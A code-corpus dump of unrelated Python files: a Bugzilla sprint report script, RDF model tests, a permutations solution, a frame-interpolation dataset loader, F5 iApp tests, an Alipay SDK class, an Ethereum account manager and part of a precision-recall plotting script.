def get_bug_ids(self, **kwargs):
"""Return list of ids of bugs from a search."""
kwargs.update({
'include_fields': ['id'],
})
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
return [bug['id'] for bug in bugs.get('bugs', [])]
def get_bugs(self, **kwargs):
get_history = kwargs.pop('history', True)
get_comments = kwargs.pop('comments', True)
kwargs.update({
'include_fields': BZ_FIELDS,
})
if 'ids' in kwargs:
kwargs['permissive'] = True
log.debug('Getting bugs with kwargs: %s', kwargs)
bugs = self.Bug.get(kwargs)
else:
if 'whiteboard' not in kwargs:
kwargs['whiteboard'] = ['u=', 'c=', 'p=']
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
bug_ids = [bug['id'] for bug in bugs.get('bugs', [])]
if not bug_ids:
return bugs
# mix in history and comments
history = comments = {}
if get_history:
history = self.get_history(bug_ids)
if get_comments:
comments = self.get_comments(bug_ids)
for bug in bugs['bugs']:
bug['history'] = history.get(bug['id'], [])
bug['comments'] = comments.get(bug['id'], {}).get('comments', [])
bug['comments_count'] = len(comments.get(bug['id'], {})
.get('comments', []))
return bugs
def get_history(self, bug_ids):
log.debug('Getting history for bugs: %s', bug_ids)
try:
history = self.Bug.history({'ids': bug_ids}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting history for bug ids: %s', bug_ids)
return {}
return dict((h['id'], h['history']) for h in history)
def get_comments(self, bug_ids):
log.debug('Getting comments for bugs: %s', bug_ids)
try:
comments = self.Bug.comments({
'ids': bug_ids,
'include_fields': ['id', 'creator', 'time', 'text'],
}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting comments for bug ids: %s', bug_ids)
return {}
return dict((int(bid), cids) for bid, cids in comments.items())
def wrap(text, indent=' '):
text = text.split('\n\n')
text = [textwrap.fill(part, expand_tabs=True, initial_indent=indent,
subsequent_indent=indent)
for part in text]
return '\n\n'.join(text)
def sprint_stats(bugs):
"""Print bugs stats block."""
# Return dict of bugs stats
#
# * total points
# * breakdown of points by component
# * breakdown of points by focus
# * breakdown of points by priority
# * other things?
def parse_whiteboard(whiteboard):
bits = {
'u': '',
'c': '',
'p': '',
's': ''
}
for part in whiteboard.split(' '):
part = part.split('=')
if len(part) != 2:
continue
if part[0] in bits:
bits[part[0]] = part[1]
return bits
def get_history(bugs, sprint):
history = []
for bug in bugs:
for item in bug.get('history', []):
for change in item.get('changes', []):
added = parse_whiteboard(change['added'])
removed = parse_whiteboard(change['removed'])
if ((change['field_name'] == 'status_whiteboard'
and removed['s'] != sprint
and added['s'] == sprint)):
history.append((
item['when'],
bug,
item['who'],
removed['s'],
added['s']
))
return history
def sprint_timeline(bugs, sprint):
"""Print timeline block."""
timeline = []
history = get_history(bugs, sprint)
# Try to associate the change that added the sprint to the
# whiteboard with a comment.
for when, bug, who, removed, added in history:
reason = 'NO COMMENT'
for comment in bug.get('comments', []):
if comment['time'] == when and comment['creator'] == who:
reason = comment['text']
break
timeline.append((
when,
bug['id'],
who,
removed,
added,
reason
))
timeline.sort(key=lambda item: item[0])
for mem in timeline:
print('%s: %s: %s' % (mem[0], mem[1], mem[2]))
print(' %s -> %s' % (mem[3] if mem[3] else 'unassigned', mem[4]))
print(wrap(mem[5]))
print('')
def print_header(text):
print(text)
print('=' * len(text))
print('')
def main(argv):
# logging.basicConfig(level=logging.DEBUG)
if not argv:
print(USAGE)
print('Error: Must specify the sprint to report on. e.g. 2012.19')
return 1
sprint = argv[0]
print(HEADER)
print('')
print('Working on %s' % sprint)
print('')
bugzilla = BugzillaAPI(
BZ_URL,
transport=SessionTransport(use_datetime=True),
allow_none=True)
bugs = bugzilla.get_bugs(
product=['support.mozilla.org'],
whiteboard=['s=' + sprint],
resolution=BZ_RESOLUTIONS,
history=True,
comments=True)
bugs = bugs['bugs']
print_header('Timeline')
sprint_timeline(bugs, sprint)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
plugins/tasks_plugin/__init__.py | shivammmmm/querybook | 1,144 | 12796803 | # from tasks.delete_mysql_cache import delete_mysql_cache
# delete_mysql_cache
|
python/tests/test_model.py | alexkreidler/oxigraph | 403 | 12796841 | import unittest
from pyoxigraph import *
XSD_STRING = NamedNode("http://www.w3.org/2001/XMLSchema#string")
XSD_INTEGER = NamedNode("http://www.w3.org/2001/XMLSchema#integer")
RDF_LANG_STRING = NamedNode("http://www.w3.org/1999/02/22-rdf-syntax-ns#langString")
class TestNamedNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(NamedNode("http://foo").value, "http://foo")
def test_string(self):
self.assertEqual(str(NamedNode("http://foo")), "<http://foo>")
def test_equal(self):
self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo"))
self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar"))
class TestBlankNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(BlankNode("foo").value, "foo")
self.assertNotEqual(BlankNode(), BlankNode())
def test_string(self):
self.assertEqual(str(BlankNode("foo")), "_:foo")
def test_equal(self):
self.assertEqual(BlankNode("foo"), BlankNode("foo"))
self.assertNotEqual(BlankNode("foo"), BlankNode("bar"))
self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo'))
self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo'))
class TestLiteral(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Literal("foo").value, "foo")
self.assertEqual(Literal("foo").datatype, XSD_STRING)
self.assertEqual(Literal("foo", language="en").value, "foo")
self.assertEqual(Literal("foo", language="en").language, "en")
self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING)
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo")
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER)
def test_string(self):
self.assertEqual(str(Literal("foo")), '"foo"')
self.assertEqual(str(Literal("foo", language="en")), '"foo"@en')
self.assertEqual(
str(Literal("foo", datatype=XSD_INTEGER)),
'"foo"^^<http://www.w3.org/2001/XMLSchema#integer>',
)
def test_equals(self):
self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo"))
self.assertEqual(
Literal("foo", language="en", datatype=RDF_LANG_STRING),
Literal("foo", language="en"),
)
self.assertNotEqual(NamedNode('http://foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), NamedNode('http://foo'))
self.assertNotEqual(BlankNode('foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), BlankNode('foo'))
class TestTriple(unittest.TestCase):
def test_constructor(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
def test_mapping(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
def test_destruct(self):
(s, p, o) = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestQuad(unittest.TestCase):
def test_constructor(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
self.assertEqual(t.graph_name, NamedNode("http://example.com/g"))
self.assertEqual(
t.triple,
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
)
self.assertEqual(
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
DefaultGraph(),
),
)
def test_mapping(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
self.assertEqual(t[3], NamedNode("http://example.com/g"))
def test_destruct(self):
(s, p, o, g) = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
self.assertEqual(g, NamedNode("http://example.com/g"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestVariable(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Variable("foo").value, "foo")
def test_string(self):
self.assertEqual(str(Variable("foo")), "?foo")
def test_equal(self):
self.assertEqual(Variable("foo"), Variable("foo"))
self.assertNotEqual(Variable("foo"), Variable("bar"))
if __name__ == "__main__":
unittest.main()
|
questions/permutations/Solution.py | marcus-aurelianus/leetcode-solutions | 141 | 12796869 | '''
Given a collection of distinct integers, return all possible permutations.
Example:
Input: [1,2,3]
Output:
[
[1,2,3],
[1,3,2],
[2,1,3],
[2,3,1],
[3,1,2],
[3,2,1]
]
'''
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
def generate_permutation(nums, ret, curr, visited):
if len(curr) == len(nums):
ret.append(list(curr))
return
for num in nums:
if num in visited:
continue
visited.add(num)
curr.append(num)
generate_permutation(nums, ret, curr, visited)
curr.pop()
visited.remove(num)
ret = []
curr = []
visited = set()
generate_permutation(nums, ret, curr, visited)
return ret
|
training/data_lib.py | vsewall/frame-interpolation | 521 | 12796891 | # Copyright 2022 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Dataset creation for frame interpolation."""
from typing import Callable, Dict, List, Optional
from absl import logging
import gin.tf
import tensorflow as tf
def _create_feature_map() -> Dict[str, tf.io.FixedLenFeature]:
"""Creates the feature map for extracting the frame triplet."""
feature_map = {
'frame_0/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_0/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_0/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_0/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_1/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_1/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_2/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_2/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'path':
tf.io.FixedLenFeature((), tf.string, default_value=''),
}
return feature_map
def _parse_example(sample):
"""Parses a serialized sample.
Args:
sample: A serialized tf.Example to be parsed.
Returns:
dictionary containing the following:
encoded_image
image_height
image_width
"""
feature_map = _create_feature_map()
features = tf.io.parse_single_example(sample, feature_map)
output_dict = {
'x0': tf.io.decode_image(features['frame_0/encoded'], dtype=tf.float32),
'x1': tf.io.decode_image(features['frame_2/encoded'], dtype=tf.float32),
'y': tf.io.decode_image(features['frame_1/encoded'], dtype=tf.float32),
# The fractional time value of frame_1 is not included in our tfrecords,
# but is always at 0.5. The model will expect this to be specificed, so
# we insert it here.
'time': 0.5,
# Store the original mid frame filepath for identifying examples.
'path': features['path'],
}
return output_dict
def _random_crop_images(crop_size: int, images: tf.Tensor,
total_channel_size: int) -> tf.Tensor:
"""Crops the tensor with random offset to the given size."""
if crop_size > 0:
crop_shape = tf.constant([crop_size, crop_size, total_channel_size])
images = tf.image.random_crop(images, crop_shape)
return images
def crop_example(example: tf.Tensor, crop_size: int,
crop_keys: Optional[List[str]] = None):
"""Random crops selected images in the example to given size and keys.
Args:
example: Input tensor representing images to be cropped.
crop_size: The size to crop images to. This value is used for both
height and width.
crop_keys: The images in the input example to crop.
Returns:
Example with cropping applied to selected images.
"""
if crop_keys is None:
crop_keys = ['x0', 'x1', 'y']
channels = [3, 3, 3]
# Stack images along channel axis, and perform a random crop once.
image_to_crop = [example[key] for key in crop_keys]
stacked_images = tf.concat(image_to_crop, axis=-1)
cropped_images = _random_crop_images(crop_size, stacked_images, sum(channels))
cropped_images = tf.split(
cropped_images, num_or_size_splits=channels, axis=-1)
for key, cropped_image in zip(crop_keys, cropped_images):
example[key] = cropped_image
return example
def apply_data_augmentation(
augmentation_fns: Dict[str, Callable[..., tf.Tensor]],
example: tf.Tensor,
augmentation_keys: Optional[List[str]] = None) -> tf.Tensor:
"""Applies random augmentation in succession to selected image keys.
Args:
augmentation_fns: A Dict of Callables to data augmentation functions.
example: Input tensor representing images to be augmented.
augmentation_keys: The images in the input example to augment.
Returns:
Example with augmentation applied to selected images.
"""
if augmentation_keys is None:
augmentation_keys = ['<KEY>']
# Apply each augmentation in sequence
augmented_images = {key: example[key] for key in augmentation_keys}
for augmentation_function in augmentation_fns.values():
augmented_images = augmentation_function(augmented_images)
for key in augmentation_keys:
example[key] = augmented_images[key]
return example
def _create_from_tfrecord(batch_size, file, augmentation_fns,
crop_size) -> tf.data.Dataset:
"""Creates a dataset from TFRecord."""
dataset = tf.data.TFRecordDataset(file)
dataset = dataset.map(
_parse_example, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Perform data_augmentation before cropping and batching
if augmentation_fns is not None:
dataset = dataset.map(
lambda x: apply_data_augmentation(augmentation_fns, x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
if crop_size > 0:
dataset = dataset.map(
lambda x: crop_example(x, crop_size=crop_size),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
dataset = dataset.batch(batch_size, drop_remainder=True)
return dataset
def _generate_sharded_filenames(filename: str) -> List[str]:
"""Generates filenames of the each file in the sharded filepath.
Based on github.com/google/revisiting-self-supervised/blob/master/datasets.py.
Args:
filename: The sharded filepath.
Returns:
A list of filepaths for each file in the shard.
"""
base, count = filename.split('@')
count = int(count)
return ['{}-{:05d}-of-{:05d}'.format(base, i, count) for i in range(count)]
def _create_from_sharded_tfrecord(batch_size,
train_mode,
file,
augmentation_fns,
crop_size,
max_examples=-1) -> tf.data.Dataset:
"""Creates a dataset from a sharded tfrecord."""
dataset = tf.data.Dataset.from_tensor_slices(
_generate_sharded_filenames(file))
# pylint: disable=g-long-lambda
dataset = dataset.interleave(
lambda x: _create_from_tfrecord(
batch_size,
file=x,
augmentation_fns=augmentation_fns,
crop_size=crop_size),
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=not train_mode)
# pylint: enable=g-long-lambda
dataset = dataset.prefetch(buffer_size=2)
if max_examples > 0:
return dataset.take(max_examples)
return dataset
@gin.configurable('training_dataset')
def create_training_dataset(
batch_size: int,
file: Optional[str] = None,
files: Optional[List[str]] = None,
crop_size: int = -1,
crop_sizes: Optional[List[int]] = None,
augmentation_fns: Optional[Dict[str, Callable[..., tf.Tensor]]] = None
) -> tf.data.Dataset:
"""Creates the training dataset.
The given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
Args:
batch_size: The number of images to batch per example.
file: (deprecated) A path to a sharded tfrecord in <tfrecord>@N format.
Deprecated. Use 'files' instead.
files: A list of paths to sharded tfrecords in <tfrecord>@N format.
crop_size: (deprecated) If > 0, images are cropped to crop_size x crop_size
using tensorflow's random cropping. Deprecated: use 'files' and
'crop_sizes' instead.
crop_sizes: List of crop sizes. If > 0, images are cropped to
crop_size x crop_size using tensorflow's random cropping.
augmentation_fns: A Dict of Callables to data augmentation functions.
Returns:
A tensorflow dataset for accessing examples that contain the input images
'x0', 'x1', ground truth 'y' and time of the ground truth 'time'=[0,1] in a
dictionary of tensors.
"""
if file:
logging.warning('gin-configurable training_dataset.file is deprecated. '
'Use training_dataset.files instead.')
return _create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size)
else:
if not crop_sizes or len(crop_sizes) != len(files):
raise ValueError('Please pass crop_sizes[] with training_dataset.files.')
if crop_size > 0:
raise ValueError(
'crop_size should not be used with files[], use crop_sizes[] instead.'
)
tables = []
for file, crop_size in zip(files, crop_sizes):
tables.append(
_create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size))
return tf.data.experimental.sample_from_datasets(tables)
@gin.configurable('eval_datasets')
def create_eval_datasets(batch_size: int,
files: List[str],
names: List[str],
crop_size: int = -1,
max_examples: int = -1) -> Dict[str, tf.data.Dataset]:
"""Creates the evaluation datasets.
As opposed to create_training_dataset this function makes sure that the
examples for each dataset are always read in a deterministic (same) order.
Each given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
The (batch_size, crop_size, max_examples) are specified for all eval datasets.
Args:
batch_size: The number of images to batch per example.
files: List of paths to a sharded tfrecord in <tfrecord>@N format.
names: List of names of eval datasets.
crop_size: If > 0, images are cropped to crop_size x crop_size using
tensorflow's random cropping.
max_examples: If > 0, truncate the dataset to 'max_examples' in length. This
can be useful for speeding up evaluation loop in case the tfrecord for the
evaluation set is very large.
Returns:
A dict of name to tensorflow dataset for accessing examples that contain the
input images 'x0', 'x1', ground truth 'y' and time of the ground truth
'time'=[0,1] in a dictionary of tensors.
"""
return {
name: _create_from_sharded_tfrecord(batch_size, False, file, None,
crop_size, max_examples)
for name, file in zip(names, files)
}
|
ch09/complexity.py | ricjuanflores/practice-of-the-python | 319 | 12796943 | def has_long_words(sentence):
if isinstance(sentence, str): # <1>
sentence = sentence.split(' ')
for word in sentence: # <2>
if len(word) > 10: # <3>
return True
return False # <4>
|
recipes/Python/286229_Remove_control_character_M_opened_html/recipe-286229.py | tdiprima/code | 2,023 | 12797009 | <reponame>tdiprima/code
import string
class Stripper( SGMLParser ) :
...
def handle_data( self, data ) :
data = string.replace( data, '\r', '' )
...
|
f5/bigip/shared/test/functional/test_iapp.py | nghia-tran/f5-common-python | 272 | 12797027 | # Copyright 2015 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from distutils.version import LooseVersion
from requests.exceptions import HTTPError
pytestmark = pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release'))
< LooseVersion('12.0.0'),
reason='Needs v12 TMOS or greater to pass.'
)
@pytest.fixture(scope='function')
def iapp_lx(mgmt_root):
fake_iapp_name = 'foo-iapp.rpm'
sio = StringIO(80*'a')
ftu = mgmt_root.shared.file_transfer.uploads
ftu.upload_stringio(sio, fake_iapp_name, chunk_size=20)
yield fake_iapp_name
tpath_name = '/var/config/rest/downloads/{0}'.format(fake_iapp_name)
mgmt_root.tm.util.unix_rm.exec_cmd('run', utilCmdArgs=tpath_name)
@pytest.fixture(scope='function')
def pkg_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='INSTALL',
packageFilePath='/var/config/rest/downloads/foo-iapp.rpm'
)
yield task
@pytest.fixture(scope='function')
def pkg_query_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='QUERY'
)
yield task
class TestPackageManagementTasks(object):
def test_create_task(self, pkg_task):
assert pkg_task.operation == "INSTALL"
assert pkg_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
def test_load_no_task(self, mgmt_root):
with pytest.raises(HTTPError) as err:
collection = mgmt_root.shared.iapp.package_management_tasks_s
collection.package_management_task.load(
id='asdasdasd'
)
assert err.value.response.status_code == 404
def test_load(self, mgmt_root, pkg_task):
collection = mgmt_root.shared.iapp.package_management_tasks_s
resource = collection.package_management_task.load(id=pkg_task.id)
assert pkg_task.id == resource.id
assert pkg_task.selfLink == resource.selfLink
def test_exists(self, mgmt_root, pkg_task):
pid = str(pkg_task.id)
collection = mgmt_root.shared.iapp.package_management_tasks_s
exists = collection.package_management_task.exists(id=pid)
assert exists is True
def test_cancel(self, pkg_task):
pkg_task.cancel()
assert pkg_task.__dict__['canceled']
def test_delete(self, pkg_task):
pkg_task.cancel()
while True:
pkg_task.refresh()
if pkg_task.status in ['CANCELED', 'FAILED', 'FINISHED']:
pkg_task.delete()
break
assert pkg_task.__dict__['deleted']
def test_package_mgmt_tasks_collection(self, mgmt_root, iapp_lx):
col = mgmt_root.shared.iapp.package_management_tasks_s.get_collection()
assert isinstance(col, list)
assert len(col) > 0
def test_create_query_task(self, pkg_query_task):
assert pkg_query_task.operation == "QUERY"
assert pkg_query_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
|
quanttrader/event/__init__.py | qalpha/quanttrader | 135 | 12797038 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .event import *
from .backtest_event_engine import *
from .live_event_engine import * |
alipay/aop/api/domain/MultiStagePayLineInfo.py | antopen/alipay-sdk-python-all | 213 | 12797040 | <reponame>antopen/alipay-sdk-python-all<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class MultiStagePayLineInfo(object):
def __init__(self):
self._payment_amount = None
self._payment_idx = None
@property
def payment_amount(self):
return self._payment_amount
@payment_amount.setter
def payment_amount(self, value):
self._payment_amount = value
@property
def payment_idx(self):
return self._payment_idx
@payment_idx.setter
def payment_idx(self, value):
self._payment_idx = value
def to_alipay_dict(self):
params = dict()
if self.payment_amount:
if hasattr(self.payment_amount, 'to_alipay_dict'):
params['payment_amount'] = self.payment_amount.to_alipay_dict()
else:
params['payment_amount'] = self.payment_amount
if self.payment_idx:
if hasattr(self.payment_idx, 'to_alipay_dict'):
params['payment_idx'] = self.payment_idx.to_alipay_dict()
else:
params['payment_idx'] = self.payment_idx
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MultiStagePayLineInfo()
if 'payment_amount' in d:
o.payment_amount = d['payment_amount']
if 'payment_idx' in d:
o.payment_idx = d['payment_idx']
return o
|
src/ape/managers/accounts.py | unparalleled-js/ape | 210 | 12797072 | from typing import Dict, Iterator, List, Type
from dataclassy import dataclass
from pluggy import PluginManager # type: ignore
from ape.api.accounts import AccountAPI, AccountContainerAPI, TestAccountAPI
from ape.types import AddressType
from ape.utils import cached_property, singledispatchmethod
from .config import ConfigManager
from .converters import ConversionManager
from .networks import NetworkManager
@dataclass
class AccountManager:
"""
The ``AccountManager`` is a container of containers for
:class:`~ape.api.accounts.AccountAPI` objects.
All containers must subclass :class:`~ape.api.accounts.AccountContainerAPI`
and are treated as singletons.
Import the accounts manager singleton from the root ``ape`` namespace.
Usage example::
from ape import accounts # "accounts" is the AccountManager singleton
my_accounts = accounts.load("dev")
"""
config: ConfigManager
converters: ConversionManager
plugin_manager: PluginManager
network_manager: NetworkManager
@cached_property
def containers(self) -> Dict[str, AccountContainerAPI]:
"""
The list of all :class:`~ape.api.accounts.AccountContainerAPI` instances
across all installed plugins.
Returns:
dict[str, :class:`~ape.api.accounts.AccountContainerAPI`]
"""
containers = {}
data_folder = self.config.DATA_FOLDER
data_folder.mkdir(exist_ok=True)
for plugin_name, (container_type, account_type) in self.plugin_manager.account_types:
# Ignore containers that contain test accounts.
if issubclass(account_type, TestAccountAPI):
continue
accounts_folder = data_folder / plugin_name
accounts_folder.mkdir(exist_ok=True)
containers[plugin_name] = container_type(accounts_folder, account_type, self.config)
return containers
@property
def aliases(self) -> Iterator[str]:
"""
All account aliases from every account-related plugin. The "alias"
is part of the :class:`~ape.api.accounts.AccountAPI`. Use the
account alias to load an account using method
:meth:`~ape.managers.accounts.AccountManager.load`.
Returns:
Iterator[str]
"""
for container in self.containers.values():
yield from container.aliases
def get_accounts_by_type(self, type_: Type[AccountAPI]) -> List[AccountAPI]:
"""
Get a list of accounts by their type.
Args:
type_ (Type[:class:`~ape.api.accounts.AccountAPI`]): The type of account
to get.
Returns:
List[:class:`~ape.api.accounts.AccountAPI`]
"""
accounts_with_type = []
for account in self:
if isinstance(account, type_):
self._inject_provider(account)
accounts_with_type.append(account)
return accounts_with_type
def __len__(self) -> int:
"""
The number of accounts managed by all account plugins.
Returns:
int
"""
return sum(len(container) for container in self.containers.values())
def __iter__(self) -> Iterator[AccountAPI]:
for container in self.containers.values():
for account in container:
self._inject_provider(account)
yield account
def __repr__(self) -> str:
return "[" + ", ".join(repr(a) for a in self) + "]"
@cached_property
def test_accounts(self) -> List[TestAccountAPI]:
"""
Accounts generated from the configured test mnemonic. These accounts
are also the subject of a fixture available in the ``test`` plugin called
``accounts``. Configure these accounts, such as the mnemonic and / or
number-of-accounts using the ``test`` section of the `ape-config.yaml` file.
Usage example::
def test_my_contract(accounts):
# The "accounts" fixture uses the AccountsManager.test_accounts()
sender = accounts[0]
receiver = accounts[1]
...
Returns:
List[:class:`~ape.api.accounts.TestAccountAPI`]
"""
accounts = []
for plugin_name, (container_type, account_type) in self.plugin_manager.account_types:
if not issubclass(account_type, TestAccountAPI):
continue
container = container_type(None, account_type, self.config)
for account in container:
self._inject_provider(account)
accounts.append(account)
return accounts
def load(self, alias: str) -> AccountAPI:
"""
Get an account by its alias.
Raises:
IndexError: When there is no local account with the given alias.
Returns:
:class:`~ape.api.accounts.AccountAPI`
"""
if alias == "":
raise ValueError("Cannot use empty string as alias!")
for account in self:
if account.alias and account.alias == alias:
self._inject_provider(account)
return account
raise IndexError(f"No account with alias '{alias}'.")
@singledispatchmethod
def __getitem__(self, account_id) -> AccountAPI:
raise NotImplementedError(f"Cannot use {type(account_id)} as account ID.")
@__getitem__.register
def __getitem_int(self, account_id: int) -> AccountAPI:
"""
Get an account by index. For example, when you do the CLI command
``ape accounts list --all``, you will see a list of enumerated accounts
by their indices. Use this method as a quicker, ad-hoc way to get an
account from that index. **NOTE**: It is generally preferred to use
:meth:`~ape.managers.accounts.AccountManager.load` or
:meth:`~ape.managers.accounts.AccountManager.__getitem_str`.
Returns:
:class:`~ape.api.accounts.AccountAPI`
"""
for idx, account in enumerate(self.__iter__()):
if account_id == idx:
self._inject_provider(account)
return account
raise IndexError(f"No account at index '{account_id}'.")
@__getitem__.register
def __getitem_str(self, account_str: str) -> AccountAPI:
"""
Get an account by address.
Raises:
IndexError: When there is no local account with the given address.
Returns:
:class:`~ape.api.accounts.AccountAPI`
"""
account_id = self.converters.convert(account_str, AddressType)
for container in self.containers.values():
if account_id in container:
account = container[account_id]
self._inject_provider(account)
return account
raise IndexError(f"No account with address '{account_id}'.")
def __contains__(self, address: AddressType) -> bool:
"""
Determine if the given address matches an account in ``ape``.
Args:
address (:class:`~ape.types.AddressType`): The address to check.
Returns:
bool: ``True`` when the given address is found.
"""
return any(address in container for container in self.containers.values())
def _inject_provider(self, account: AccountAPI):
if self.network_manager.active_provider is not None:
account.provider = self.network_manager.active_provider
|
BlogPosts/Average_precision/average_precision_post_code.py | markgraves/roamresearch | 190 | 12797086 | <gh_stars>100-1000
from copy import copy
from collections import OrderedDict
import numpy as np
import pandas as pd
from sklearn.metrics import average_precision_score, auc, roc_auc_score
from sklearn.metrics import precision_recall_curve
from sklearn.linear_model import LogisticRegressionCV
from sklearn.cross_validation import StratifiedShuffleSplit
import matplotlib.pyplot as plt
import matplotlib
from IPython.display import display, HTML
matplotlib.style.use('../../src/roam.mplstyle')
def generate_data_and_constant_predictions(n, frac_positive):
"""
Generates data in a fixed positive:negative ratio, and returns the
data and scores from a dummy model that predicts 0.5 for all examples.
Parameters
----------
n : int
Number of examples
frac_positive : float
Fraction of the examples that are positive
Returns
-------
observations : list
Consisting of (frac_positive * n) 1s, and (n - (frac_positive * n)) 0s
constant_predictions : list
Same length as observations
"""
n_positive = int(frac_positive * n)
n_negative = n - n_positive
observations = [1 for _ in range(n_positive)] + \
[0 for _ in range(n_negative)]
constant_predictions = [0.5 for _ in range(n_positive + n_negative)]
return observations, constant_predictions
def plot_recall_precision_from_predictions(true, scores, **kwargs):
"""
Computes precision and recall from some observations and scores assigned
to them, and plots a precision-recall curve.
Parameters
----------
true : list
Must be binary (i.e. 1s and 0s).
